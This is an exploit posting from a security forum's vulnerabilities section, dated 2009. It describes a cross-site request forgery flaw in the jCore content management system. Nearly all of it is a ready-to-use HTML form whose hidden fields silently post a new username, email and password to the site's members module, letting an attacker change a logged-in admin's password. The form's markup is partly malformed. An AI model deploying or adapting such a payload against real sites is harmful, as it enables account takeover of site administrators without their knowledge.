jCore ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > jCore ~ XSRF Vuln.

Madde
	Author : Bug Researchers/BARCOD3
	Date : 04.11.2009 23:48:38
	# jCore ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : jCore # Vulnerable Type : XSRF # Infection : Admin password Change Edilebilir. # author : BARCOD3 - Bug Researchers # Demo : http://demo.jcore.net/admin Admin ; Demo password ; Demo # Home : ozkanbozkurt.com ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <h3>BARCOD3</h3> <form action=’http://demo.jcore.net/modules/members?’ method=’post’ enctype=’multipart/form-data’ > <input type=’hidden’ name=’username’ id=’entryusername’ class=’text-entry’ value=’username’ /> <input type=’hidden’ name=’Email’ id=’entryEmail’ class=’text-entry’ value=’USER@EMAIL.COM’ /> <input type=’hidden’ name=’Website’ id=’entryWebsite’ class=’text-entry’ value=’’OZKANBOZKURT.COM > <input type=’checkbox’ name=’StayLoggedIn’ id=’entryStayLoggedIn’ class=’checkbox-entry’ value=’1’ / <input type=’checkbox’ name=’DisableNotificationEmails’ id=’entryDisableNotificationEmails’ class=’checkbox-entry’ value=’1’ /> <input type=’hidden’ name=’password’ id=’entrypassword’ class=’text-entry’ value=’passWORD’ /> <input type=’hidden’ name=’Repassword’ id=’entryRepassword’ class=’text-entry’ value=’passWORD’ /> <input type=’submit’ name=’memberaccountsubmit’ id=’buttonmemberaccountsubmit’ class=’button button-memberaccountsubmit’ value=’Submit’ /> </form> < -- bug code end of -- >